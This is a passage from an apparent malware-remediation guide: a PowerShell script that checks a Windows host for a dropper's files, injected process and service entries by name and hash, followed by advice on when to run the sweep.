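            $sha = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            [pscustomobject]@{
                Path           = $_.FullName
                Bytes          = $_.Length
                LastWrite      = $_.LastWriteTime
                SHA256         = $sha
                IsReportSample = ($null -ne $sha -and $sha -ieq $ReportSha256)
            }
        }
    }
}

function Find-ReportProcesses {
    # The dropper runs under whatever name it was delivered with; the stable indicator is the
    # injected host, which the dump shows launched from C:\Windows\system32\AdN\ICZM.exe.
    Get-CimInstance Win32_Process -Filter "Name = 'ICZM.exe'" |
        Select-Object ProcessId, ParentProcessId, ExecutablePath, CommandLine
}

function Find-ReportServices {
    # Service or kernel-driver registrations whose image is the dropped .sys or the injected host.
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
        $image = (Get-ItemProperty -LiteralPath $_.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
        if ($image -like '*CDClient_EX.sys*' -or $image -like '*\AdN\ICZM.exe*') {
            [pscustomobject]@{ Service = $_.PSChildName; ImagePath = $image }
        }
    }
}

function Test-ReportSample {
    # Confirm a suspected copy of the original dropper against both hashes in the report.
    param([Parameter(Mandatory)][string]$Path)
    $sha = (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash
    $md5 = (Get-FileHash -LiteralPath $Path -Algorithm MD5).Hash
    [pscustomobject]@{ Path = $Path; SHA256Match = ($sha -ieq $ReportSha256); MD5Match = ($md5 -ieq $ReportMd5) }
}

$files = @(Find-ReportFiles)
$procs = @(Find-ReportProcesses)
$svcs  = @(Find-ReportServices)

Write-Host ("Artifact files found: {0}" -f $files.Count); $files | Format-Table -AutoSize
Write-Host ("ICZM.exe processes:   {0}" -f $procs.Count); $procs | Format-Table -AutoSize
Write-Host ("Service entries:      {0}" -f $svcs.Count);  $svcs  | Format-Table -AutoSize

# Non-zero exit when any indicator is present, so the script can drive a fleet-wide sweep.
if ($files.Count -or $procs.Count -or $svcs.Count) { exit 1 } else { exit 0 }
```

Run it before step 2 to see which of the listed paths actually exist on the host, and again after the reboot in step 6 to confirm nothing was recreated; a non-zero exit code means at least one indicator is still present. The browser shortcut (.lnk) entries and Firefox cache files from the list are deliberately not swept here: a 1- or 2-byte write to an existing shortcut is worth inspecting (the target the shortcut now points to) rather than blindly deleting.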
